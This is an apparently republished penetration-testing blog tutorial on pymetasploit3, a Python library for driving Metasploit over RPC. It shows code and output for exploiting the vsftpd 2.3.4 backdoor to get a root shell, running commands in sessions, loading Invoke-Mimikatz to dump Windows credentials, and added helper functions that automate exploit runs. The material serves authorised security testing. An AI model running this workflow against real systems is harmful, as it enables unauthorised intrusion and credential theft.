pymetasploit3 – Metasploit Automation Library
Dan McInerney, Senior Security Advisor, Coalfire, May 20, 2019
Do you have a list of tasks you perform on every penetration test, such as SSH brute forcing or port scanning? Then automate them with Python and Metasploit. Unfortunately, for many years there has been no full-featured Python library that makes this easy. Until now.
pymetasploit3 is built on allfro's pymetasploit library and makes automating Metasploit much simpler. Because pymetasploit3 targets Python 3, you can also use the power of Python 3's asyncio library in your automation tasks.
Install
mkdir your-new-project-directory
cd your-new-project-directory
pipenv install --three pymetasploit3
pipenv shell
or
pip install --user pymetasploit3
Start the Metasploit RPC server
Run either msfconsole with the msgrpc plugin, or the standalone msfrpcd daemon. Either way, anyone who knows the RPC password gets full control of Metasploit, including every open session, so keep the service bound to localhost (msfrpcd listens on all interfaces unless it is started with -a 127.0.0.1) and use a strong password.
Msfconsole
$ msfconsole
msf> load msgrpc Pass=yourpassword
Msfrpcd
$ msfrpcd -P yourpassword
Usage
Now you are ready to talk to Metasploit. To connect to the msfrpcd daemon, create an RPC client like this (msfrpcd serves SSL unless it was started with -S, so the client's ssl= setting has to match the server):
>>> from pymetasploit3.msfrpc import *
>>> client = MsfRpcClient('yourpassword', ssl=True)
To connect to the msfconsole msgrpc plugin instead, pass its port. The plugin listens on 55552 by default, while msfrpcd and the client default to 55553:
>>> from pymetasploit3.msfrpc import *
>>> client = MsfRpcClient('yourpassword', port=55552)
The RPC client is the core of the library; all functionality hangs off this object. You can list its public attributes with dir():
>>> [m for m in dir(client) if not m.startswith('_')]
['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins', 'port', 'server', 'token', 'sessions', 'ssl', 'uri']
>>>
Let's take a look at the exploit modules:
>>> client.modules.exploit
['windows/wins/ms04_045_wins', 'windows/winrm/winrm_script_exec', 'windows/vpn/safenet_ike_11',
'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...
'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']
>>>
Creating an exploit module object is easy: pass the module type and the module name to client.modules.use().
>>> exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')
>>>
Now let's set the module options. First, look at which targets are available and pick the right one.
>>> exploit.targets
{0: 'Automatic'}
>>>
>>> exploit.default_target
0
>>>
In this case there is only one target, and it is already the default. For an exploit with multiple targets, you set the one you want like this:
>>> exploit.target = 0
>>>
Let's find the payloads that are compatible with this target:
>>> exploit.targetpayloads()
['cmd/unix/interact']
>>>
The next step is to view and set the module options.
>>> exploit.options
['WORKSPACE', 'VERBOSE', 'WfsDelay', 'EnableContextEncoding', 'ContextInformationFile', 'DisablePayloadHandler', 'RHOSTS', 'RPORT', 'SSL', 'SSLVersion', 'SSLVerifyMode', 'SSLCipher', 'Proxies', 'CPORT', 'CHOST', 'ConnectTimeout', 'TCP::max_send_size', 'TCP::send_delay']
>>>
Most of the options above already have default values, but how do we know which ones must be set, and how do we set them?
>>> exploit.missing_required
['RHOSTS']
>>> exploit['RHOSTS'] = '192.168.1.2'
>>> exploit.runoptions
{'VERBOSE': False, 'WfsDelay': 0, 'EnableContextEncoding': False, 'DisablePayloadHandler': False, 'RPORT': 21, 'SSL': False, 'SSLVersion': 'Auto', 'SSLVerifyMode': 'PEER', 'ConnectTimeout': 10, 'TCP::max_send_size': 0, 'TCP::send_delay': 0, 'RHOSTS': '192.168.1.2'}
>>>
We can see in the output above that RHOSTS is now set to 192.168.1.2. We are ready to pop a shell by running the exploit in a Metasploit console. The Metasploit console is the prompt you get when you start Metasploit with the msfconsole command, but you can also create consoles when Metasploit was started as the RPC daemon with msfrpcd. Next we create a new console, get its console ID, and run the exploit module inside that console so we can collect the module's output.
>>> console_id = client.consoles.console().cid
>>> console = client.consoles.console(console_id)
>>> console.run_module_with_output(exploit, payload='cmd/unix/interact')
# Some time passes
'VERBOSE => false\nWfsDelay => 0 [...] [*] 192.168.1.2:21 - Banner: 220 vsFTPd 2.3.4\n[*] 192.168.1.2:21 - USER: 331 Please specify the password
[...]'
>>>
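The module set-up and console run above, wrapped in functions that validate before anything is fired. This is an added example, not code from the original post or from the pymetasploit3 project: every option name is checked against module.options, missing_required is consulted after the options are set, the payload is checked against targetpayloads(), and the console output is parsed for the "session N opened" line and cross-checked against client.sessions.list. The functions use only the attribute and method names shown above, with two assumptions: connect() assumes MsfRpcClient accepts server= and ssl= keywords next to port=, and run_exploit() calls console.destroy() to clean up the console afterwards, a pymetasploit3 method not shown on this page. The classes under the "constructed stand-ins" comment are fakes so the block runs without a live msfrpcd; with a real client, pass it in instead of what demo_exploit() builds.

```python
import re
from types import SimpleNamespace

# Metasploit prints this line when an exploit hands back a session.
SESSION_OPENED = re.compile(r"\[\*\] (?P<kind>Command shell|Meterpreter) session (?P<sid>\d+) opened")


def connect(password, server="127.0.0.1", port=55553, ssl=False):
    """Build an MsfRpcClient; imported lazily so the rest of the block runs offline.
    Assumption: MsfRpcClient accepts server= and ssl= keywords alongside port=."""
    from pymetasploit3.msfrpc import MsfRpcClient
    return MsfRpcClient(password, server=server, port=port, ssl=ssl)


def configure_module(module, options, payload=None):
    """Set options on a module object and refuse to continue if it is not runnable.
    Returns module.runoptions so the caller can log exactly what will hit the target."""
    for name, value in options.items():
        if name not in module.options:
            raise KeyError(f"{name!r} is not an option of this module: {module.options}")
        module[name] = value
    missing = module.missing_required
    if missing:
        raise ValueError(f"required options still unset: {missing}")
    if payload is not None and payload not in module.targetpayloads():
        raise ValueError(f"payload {payload!r} is not compatible with target {module.target}; "
                         f"choices: {module.targetpayloads()}")
    return module.runoptions


def run_exploit(client, module, payload):
    """Run the module in a fresh console; return (console output, session ids it opened)."""
    before = set(client.sessions.list)
    console = client.consoles.console()          # new console; its id is console.cid
    try:
        output = console.run_module_with_output(module, payload=payload)
    finally:
        console.destroy()                        # assumption: do not leak consoles on the server
    # Only trust a session id that is both announced in the output and visible in the list.
    announced = [m.group("sid") for m in SESSION_OPENED.finditer(output)]
    new_ids = set(client.sessions.list) - before
    return output, [sid for sid in announced if sid in new_ids]


# ---- constructed stand-ins so the block runs without a live Metasploit ----
class _FakeModule:
    """Mimics the subset of the module object used above (vsftpd_234_backdoor shape)."""
    options = ["RHOSTS", "RPORT", "VERBOSE"]
    target = 0

    def __init__(self):
        self._set = {"RPORT": 21, "VERBOSE": False}

    def __setitem__(self, key, value):
        self._set[key] = value

    @property
    def missing_required(self):
        return [o for o in ("RHOSTS",) if o not in self._set]

    @property
    def runoptions(self):
        return dict(self._set)

    def targetpayloads(self):
        return ["cmd/unix/interact"]


class _FakeConsole:
    cid = "0"

    def __init__(self, client):
        self._client = client

    def run_module_with_output(self, module, payload):
        rhost = module.runoptions["RHOSTS"]
        sid = str(len(self._client.sessions.list) + 1)
        self._client.sessions.list[sid] = {"type": "shell", "target_host": rhost}
        return (f"[*] {rhost}:21 - Banner: 220 vsFTPd 2.3.4\n"
                f"[*] Command shell session {sid} opened (172.16.14.1:58429 -> {rhost}:6200)\n")

    def destroy(self):
        pass


class _FakeClient:
    def __init__(self):
        self.sessions = SimpleNamespace(list={})
        self.consoles = SimpleNamespace(console=lambda: _FakeConsole(self))


def demo_exploit():
    """The vsftpd workflow from the post, run against the fake client."""
    client = _FakeClient()
    exploit = _FakeModule()
    runopts = configure_module(exploit, {"RHOSTS": "192.168.1.2"}, payload="cmd/unix/interact")
    output, sessions = run_exploit(client, exploit, "cmd/unix/interact")
    return runopts, output, sessions
```

The cross-check in run_exploit matters in automation: run_module_with_output returns whatever the console printed, and a module that fails late still produces a long transcript, so the session list is the authoritative signal that you actually got a shell.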
Now we have a session; let's interact with it. client.sessions.list returns a dictionary in which each key is a session identifier and the value is that session's data.
>>> client.sessions.list
{'1': {'info': '', 'username': 'jsmith', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',
'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',
'exploit_uuid': '3whbuevf', 'tunnel_peer': '192.168.1.2:6200', 'workspace': 'false', 'routes': '',
'target_host': '192.168.1.2', 'type': 'shell', 'session_host': '192.168.1.2', 'desc': 'Command shell'}}
>>> shell = client.sessions.session('1')
>>> shell.write('whoami')
>>> shell.read()
'\nroot'
>>>
Suppose you want to run a command in this session, wait for it to finish, and get its output back. That is easy with consoles, because every console can tell you whether it is still busy running the last command you sent.
>>> console.is_busy()
False
>>>
Unfortunately, sessions have no such built-in capability in Metasploit. There are three ways around this. Option 1 waits until any data at all can be read from the session and returns it. This works well for system commands that print all their output at once. Next we run the arp command in the remote session and return as soon as we receive any data.
>>> cmd = 'arp'
>>> shell.run_with_output(cmd)
'\n Address HWtype HWaddress Flags Mask […]'
>>>
Option 2 waits for a fixed period of time and then returns everything that arrived in that window. One detail to watch: by default, Metasploit's communication timeout is 300 seconds. If you want to run a command that takes longer than 300 seconds, you must raise Metasploit's communication timeout as well as the run_with_output() timeout. For example, to change a Meterpreter session's communication timeout to 500 seconds, run set_timeouts -c 500 in the Meterpreter shell. The shell in the example below is still the same plain Linux shell from the previous example, so that step is not needed here.
>>> cmd = 'arp'
>>> shell.run_with_output(cmd, timeout=10, timeout_exception=False)
# 10 seconds pass
'\n Address HWtype HWaddress Flags Mask […]'
>>>
Option 3 stops collecting data as soon as one of a list of strings appears in the output. For complex commands this is usually the most consistent approach. Below we look for the strings 'Address' and 'HWtype', which we know appear in the output of the arp command on Linux. The strings '[-]' and '[+]' are usually good default end strings for a Meterpreter session, because Metasploit normally prints one of them when a command completes or fails. Metasploit's output is not consistent from one command to the next, however, so choose your end strings carefully: if the marker never arrives, a later read of the data buffer will mix the previous command's output into the output of your new command. As soon as one of the chosen end strings is read from the session, all data collected up to that point is returned.
>>> cmd = 'arp'
>>> end_strs = ['Address', 'HWtype']
>>> shell.run_with_output(cmd, end_strs=end_strs)
'\n Address HWtype HWaddress Flags Mask […]'
>>>
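A fourth approach for plain command-shell sessions, added here as an example that is not from the original post or from pymetasploit3 itself: instead of guessing an end string from the command's own output, append an echo of a random marker to the command and read until that marker comes back on a line of its own. Only the write() and read() calls shown above are used, so it works for any Unix shell session regardless of how much output the command produces, and the buffer is drained first so leftovers from an earlier command cannot be mistaken for the new output. _FakeShell is a constructed stand-in that echoes the command line and returns output in small chunks, as a live session does, so the block runs without a real session; a value of None in its response table simulates a command that never finishes.

```python
import time
import uuid


def _split_at_marker(buf, marker):
    """Return (output_lines, finished). A line that is exactly the marker ends the
    output; a line that merely contains 'echo <marker>' is the shell echoing our
    own command line and is dropped."""
    out = []
    for line in buf.splitlines():
        if line.strip() == marker:
            return out, True
        if f"echo {marker}" in line:
            continue
        out.append(line)
    return out, False


def run_cmd(session, cmd, timeout=30.0, poll=0.1):
    """Run cmd in a Unix shell session and return its output once it has finished.
    Raises TimeoutError (with the partial output) if the marker never shows up."""
    marker = f"__done_{uuid.uuid4().hex}__"
    # 1. Drain anything left over from earlier commands.
    while session.read():
        pass
    # 2. Send the command; ';' makes the marker print even if cmd itself fails.
    session.write(f"{cmd}; echo {marker}")
    # 3. Accumulate reads until the marker arrives on its own line or we time out.
    buf = ""
    deadline = time.monotonic() + timeout
    while True:
        lines, done = _split_at_marker(buf, marker)
        if done:
            return "\n".join(lines).strip("\n")
        if time.monotonic() > deadline:
            raise TimeoutError(f"no marker after {timeout}s; partial output: {buf[:200]!r}")
        chunk = session.read()
        if chunk:
            buf += chunk
        else:
            time.sleep(poll)


# ---- constructed stand-in so the block runs without a live session ----
class _FakeShell:
    """Mimics a pymetasploit3 shell session: write() queues a command, read() hands
    the response back seven characters at a time, and the buffer starts out holding
    stale data from an earlier command."""

    def __init__(self, responses, stale="leftover from an earlier command\n"):
        self._responses = responses          # {command: output, or None = never returns}
        self._pending = stale
        self.sent = []

    def write(self, data):
        self.sent.append(data)
        cmd, _, echo = data.rpartition("; ")  # split off our 'echo <marker>' suffix
        body = self._responses.get(cmd, f"sh: {cmd}: not found\n")
        if body is None:
            return                            # command hangs: nothing ever comes back
        marker = echo.split(" ", 1)[1]
        self._pending += f"$ {data}\n{body}{marker}\n"   # shell echoes the command line

    def read(self):
        chunk, self._pending = self._pending[:7], self._pending[7:]
        return chunk


ARP_OUTPUT = ("Address      HWtype  HWaddress          Flags Mask  Iface\n"
              "192.168.1.1  ether   00:11:22:33:44:55  C           eth0\n")


def demo_shell():
    """Run arp and then id through the fake shell; returns both outputs."""
    shell = _FakeShell({"arp": ARP_OUTPUT, "id": "uid=0(root) gid=0(root)\n"})
    return run_cmd(shell, "arp"), run_cmd(shell, "id")
```

With a real session from client.sessions.session('1'), call run_cmd(shell, 'arp') directly. The marker is random per call, so a command whose own output happens to contain '[-]' or 'Address' cannot end the read early, and a command that hangs surfaces as a TimeoutError carrying the partial output rather than as silently mixed buffers on the next call.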
If you have a Meterpreter shell on a Windows host, you can also import and run PowerShell scripts.
>>> met_shell = client.sessions.session('2')
>>> psh_script = '/home/user/scripts/Invoke-Mimikatz.ps1'
>>> met_shell.import_psh(psh_script)
>>> met_shell.run_psh_cmd('Invoke-Mimikatz')
# Some time passes
'Mimikatz output…'
>>>
This covers the basic functionality of pymetasploit3. Now go and replace your tooling with a small Python script.
This article was compiled and translated by 白帽汇 and does not represent any view or position of 白帽汇.
Source: https://www.coalfire.com/The-Coalfire-Blog/May-2019/pymetasploit3-Metasploit-Automation-Library